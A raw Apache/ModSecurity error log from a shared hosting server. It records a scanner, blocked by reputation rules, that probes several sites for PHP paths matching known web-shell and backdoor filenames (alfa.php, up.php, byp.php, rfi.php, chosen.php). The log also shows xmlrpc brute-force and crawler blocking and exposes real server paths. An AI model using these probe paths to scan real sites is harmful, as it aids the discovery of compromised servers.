[Tue May 26 12:54:50.566976 2026] [security2:error] [pid 461618:tid 461831] [client 20.9.81.163:44722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/gg.php"] [unique_id "ahVKwlyiSlSCHr1fdr23TwAAANg"]
[Tue May 26 12:54:50.567062 2026] [security2:error] [pid 461618:tid 461831] [client 20.9.81.163:44722] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/gg.php"] [unique_id "ahVKwlyiSlSCHr1fdr23TwAAANg"]
[Tue May 26 12:54:50.696926 2026] [security2:error] [pid 461618:tid 461827] [client 20.9.81.163:37957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/gifclass.php"] [unique_id "ahVKwlyiSlSCHr1fdr23UAAAANQ"]
[Tue May 26 12:54:50.697027 2026] [security2:error] [pid 461618:tid 461827] [client 20.9.81.163:37957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/gifclass.php"] [unique_id "ahVKwlyiSlSCHr1fdr23UAAAANQ"]
[Tue May 26 12:54:50.818431 2026] [security2:error] [pid 461618:tid 461799] [client 20.9.81.163:29828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/sql.php"] [unique_id "ahVKwlyiSlSCHr1fdr23UQAAALg"]
[Tue May 26 12:54:50.818523 2026] [security2:error] [pid 461618:tid 461799] [client 20.9.81.163:29828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/sql.php"] [unique_id "ahVKwlyiSlSCHr1fdr23UQAAALg"]
[Tue May 26 12:54:50.944059 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:31437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/up.php"] [unique_id "ahVKwlyiSlSCHr1fdr23WAAAAIY"]
[Tue May 26 12:54:50.944166 2026] [security2:error] [pid 461618:tid 461749] [client 20.9.81.163:31437] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/up.php"] [unique_id "ahVKwlyiSlSCHr1fdr23WAAAAIY"]
[Tue May 26 12:54:51.091260 2026] [security2:error] [pid 461618:tid 461816] [client 20.9.81.163:32739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVKw1yiSlSCHr1fdr23XAAAAMk"]
[Tue May 26 12:54:51.091375 2026] [security2:error] [pid 461618:tid 461816] [client 20.9.81.163:32739] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVKw1yiSlSCHr1fdr23XAAAAMk"]
[Tue May 26 12:54:51.217259 2026] [security2:error] [pid 461618:tid 461791] [client 20.9.81.163:30057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-admin/about.php"] [unique_id "ahVKw1yiSlSCHr1fdr23YwAAALA"]
[Tue May 26 12:54:51.217359 2026] [security2:error] [pid 461618:tid 461791] [client 20.9.81.163:30057] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-admin/about.php"] [unique_id "ahVKw1yiSlSCHr1fdr23YwAAALA"]
[Tue May 26 12:54:51.343690 2026] [security2:error] [pid 461618:tid 461833] [client 20.9.81.163:29839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/function.php"] [unique_id "ahVKw1yiSlSCHr1fdr23ZwAAANo"]
[Tue May 26 12:54:51.343797 2026] [security2:error] [pid 461618:tid 461833] [client 20.9.81.163:29839] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/function.php"] [unique_id "ahVKw1yiSlSCHr1fdr23ZwAAANo"]
[Tue May 26 12:54:51.464724 2026] [security2:error] [pid 461618:tid 461858] [client 20.9.81.163:37971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVKw1yiSlSCHr1fdr23dgAAAPM"]
[Tue May 26 12:54:51.464854 2026] [security2:error] [pid 461618:tid 461858] [client 20.9.81.163:37971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVKw1yiSlSCHr1fdr23dgAAAPM"]
[Tue May 26 12:54:51.606356 2026] [security2:error] [pid 461618:tid 461760] [client 20.9.81.163:31460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKw1yiSlSCHr1fdr23dwAAAJE"]
[Tue May 26 12:54:51.606465 2026] [security2:error] [pid 461618:tid 461760] [client 20.9.81.163:31460] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKw1yiSlSCHr1fdr23dwAAAJE"]
[Tue May 26 12:54:51.757009 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:9621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/66.php"] [unique_id "ahVKw1yiSlSCHr1fdr23fwAAALo"]
[Tue May 26 12:54:51.757116 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:9621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/66.php"] [unique_id "ahVKw1yiSlSCHr1fdr23fwAAALo"]
[Tue May 26 12:54:51.879241 2026] [security2:error] [pid 461618:tid 461804] [client 20.9.81.163:31444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/css.php"] [unique_id "ahVKw1yiSlSCHr1fdr23hwAAAL0"]
[Tue May 26 12:54:51.879336 2026] [security2:error] [pid 461618:tid 461804] [client 20.9.81.163:31444] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/css.php"] [unique_id "ahVKw1yiSlSCHr1fdr23hwAAAL0"]
[Tue May 26 12:54:52.028703 2026] [security2:error] [pid 461618:tid 461857] [client 20.9.81.163:31428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/init.php"] [unique_id "ahVKxFyiSlSCHr1fdr23jgAAAPI"]
[Tue May 26 12:54:52.028805 2026] [security2:error] [pid 461618:tid 461857] [client 20.9.81.163:31428] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/init.php"] [unique_id "ahVKxFyiSlSCHr1fdr23jgAAAPI"]
[Tue May 26 12:54:52.157451 2026] [security2:error] [pid 461618:tid 461770] [client 20.9.81.163:30017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/byp.php"] [unique_id "ahVKxFyiSlSCHr1fdr23jwAAAJs"]
[Tue May 26 12:54:52.157542 2026] [security2:error] [pid 461618:tid 461770] [client 20.9.81.163:30017] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/byp.php"] [unique_id "ahVKxFyiSlSCHr1fdr23jwAAAJs"]
[Tue May 26 12:54:52.294268 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:31486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/index.php"] [unique_id "ahVKxFyiSlSCHr1fdr23kwAAAJk"]
[Tue May 26 12:54:52.294349 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:31486] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/index.php"] [unique_id "ahVKxFyiSlSCHr1fdr23kwAAAJk"]
[Tue May 26 12:54:52.460743 2026] [security2:error] [pid 461618:tid 461769] [client 20.9.81.163:31427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/index/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23lAAAAJo"]
[Tue May 26 12:54:52.460871 2026] [security2:error] [pid 461618:tid 461769] [client 20.9.81.163:31427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/index/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23lAAAAJo"]
[Tue May 26 12:54:52.599166 2026] [security2:error] [pid 461618:tid 461802] [client 20.9.81.163:46873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/about/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23pAAAALs"]
[Tue May 26 12:54:52.599326 2026] [security2:error] [pid 461618:tid 461802] [client 20.9.81.163:46873] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/about/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23pAAAALs"]
[Tue May 26 12:54:52.757098 2026] [security2:error] [pid 461618:tid 461772] [client 20.9.81.163:37983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/as/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23pwAAAJ0"]
[Tue May 26 12:54:52.757257 2026] [security2:error] [pid 461618:tid 461772] [client 20.9.81.163:37983] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/as/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23pwAAAJ0"]
[Tue May 26 12:54:52.874746 2026] [security2:error] [pid 461618:tid 461750] [client 20.9.81.163:38006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23qAAAAIc"]
[Tue May 26 12:54:52.874868 2026] [security2:error] [pid 461618:tid 461750] [client 20.9.81.163:38006] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/file/chosen.php"] [unique_id "ahVKxFyiSlSCHr1fdr23qAAAAIc"]
[Tue May 26 12:54:53.013551 2026] [security2:error] [pid 461618:tid 461760] [client 20.9.81.163:10256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/chosen/chosen.php"] [unique_id "ahVKxVyiSlSCHr1fdr23rgAAAJE"]
[Tue May 26 12:54:53.013678 2026] [security2:error] [pid 461618:tid 461760] [client 20.9.81.163:10256] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/chosen/chosen.php"] [unique_id "ahVKxVyiSlSCHr1fdr23rgAAAJE"]
[Tue May 26 12:54:53.020982 2026] [security2:error] [pid 461618:tid 461815] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKxFyiSlSCHr1fdr23owAAAMg"]
[Tue May 26 12:54:53.140483 2026] [security2:error] [pid 461618:tid 461796] [client 20.9.81.163:10255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/css/chosen.php"] [unique_id "ahVKxVyiSlSCHr1fdr23tAAAALU"]
[Tue May 26 12:54:53.140588 2026] [security2:error] [pid 461618:tid 461796] [client 20.9.81.163:10255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/css/chosen.php"] [unique_id "ahVKxVyiSlSCHr1fdr23tAAAALU"]
[Tue May 26 12:54:53.289600 2026] [security2:error] [pid 461618:tid 461765] [client 85.208.96.196:29294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVKxVyiSlSCHr1fdr23uQAAAJY"]
[Tue May 26 12:54:53.289754 2026] [security2:error] [pid 461618:tid 461765] [client 85.208.96.196:29294] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVKxVyiSlSCHr1fdr23uQAAAJY"]
[Tue May 26 12:54:53.983424 2026] [security2:error] [pid 461618:tid 461751] [client 20.9.81.163:17380] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "azurmediatec.com"] [uri "/index.php"] [unique_id "ahVKxVyiSlSCHr1fdr23twAAAIg"]
[Tue May 26 12:54:53.984716 2026] [autoindex:error] [pid 461618:tid 461783] [client 185.217.125.16:50692] AH01276: Cannot serve directory /home1/vcress4h/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:54:54.107537 2026] [security2:error] [pid 461618:tid 461763] [client 20.9.81.163:29864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/date.php"] [unique_id "ahVKxlyiSlSCHr1fdr231QAAAJQ"]
[Tue May 26 12:54:54.107683 2026] [security2:error] [pid 461618:tid 461763] [client 20.9.81.163:29864] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/date.php"] [unique_id "ahVKxlyiSlSCHr1fdr231QAAAJQ"]
[Tue May 26 12:54:54.246935 2026] [security2:error] [pid 461618:tid 461847] [client 20.9.81.163:32730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/pomo.php"] [unique_id "ahVKxlyiSlSCHr1fdr233AAAAOg"]
[Tue May 26 12:54:54.247075 2026] [security2:error] [pid 461618:tid 461847] [client 20.9.81.163:32730] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/pomo.php"] [unique_id "ahVKxlyiSlSCHr1fdr233AAAAOg"]
[Tue May 26 12:54:54.369281 2026] [security2:error] [pid 461618:tid 461814] [client 20.9.81.163:40965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/8.php"] [unique_id "ahVKxlyiSlSCHr1fdr233wAAAMc"]
[Tue May 26 12:54:54.369363 2026] [security2:error] [pid 461618:tid 461814] [client 20.9.81.163:40965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/8.php"] [unique_id "ahVKxlyiSlSCHr1fdr233wAAAMc"]
[Tue May 26 12:54:54.508523 2026] [security2:error] [pid 461618:tid 461779] [client 20.9.81.163:30060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/t/rfi.php"] [unique_id "ahVKxlyiSlSCHr1fdr234AAAAKQ"]
[Tue May 26 12:54:54.508656 2026] [security2:error] [pid 461618:tid 461779] [client 20.9.81.163:30060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/t/rfi.php"] [unique_id "ahVKxlyiSlSCHr1fdr234AAAAKQ"]
[Tue May 26 12:54:54.515823 2026] [security2:error] [pid 461618:tid 461845] [client 157.20.138.61:61019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKxlyiSlSCHr1fdr234QAAAOY"]
[Tue May 26 12:54:54.515979 2026] [security2:error] [pid 461618:tid 461845] [client 157.20.138.61:61019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKxlyiSlSCHr1fdr234QAAAOY"]
[Tue May 26 12:54:54.711774 2026] [security2:error] [pid 461618:tid 461785] [client 20.9.81.163:1265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/sendmail.php"] [unique_id "ahVKxlyiSlSCHr1fdr237gAAAKo"]
[Tue May 26 12:54:54.711898 2026] [security2:error] [pid 461618:tid 461785] [client 20.9.81.163:1265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/sendmail.php"] [unique_id "ahVKxlyiSlSCHr1fdr237gAAAKo"]
[Tue May 26 12:54:56.495337 2026] [security2:error] [pid 461618:tid 461748] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKyFyiSlSCHr1fdr24FwAAAIU"]
[Tue May 26 12:54:59.250608 2026] [security2:error] [pid 461618:tid 461875] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKylyiSlSCHr1fdr24cwAAAQQ"]
[Tue May 26 12:54:59.812640 2026] [security2:error] [pid 461618:tid 461809] [client 194.26.192.99:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "digitalgerminate.com"] [uri "/"] [unique_id "ahVKy1yiSlSCHr1fdr24lQAAAMI"]
[Tue May 26 12:55:00.887003 2026] [security2:error] [pid 461618:tid 461652] [remote 194.26.192.99:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVKzFyiSlSCHr1fdr24ngAAtSE"]
[Tue May 26 12:55:01.103924 2026] [security2:error] [pid 461618:tid 461814] [client 78.46.190.63:31066] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKzVyiSlSCHr1fdr24vQAAAMc"], referer: http://ucdc.co.in/
[Tue May 26 12:55:01.169813 2026] [security2:error] [pid 461618:tid 461640] [remote 74.7.241.58:35782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVKzVyiSlSCHr1fdr24wgABBBU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields/resources
[Tue May 26 12:55:01.747703 2026] [security2:error] [pid 461618:tid 461700] [remote 194.26.192.99:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-admin/install.php"] [unique_id "ahVKzVyiSlSCHr1fdr244QAAlFE"]
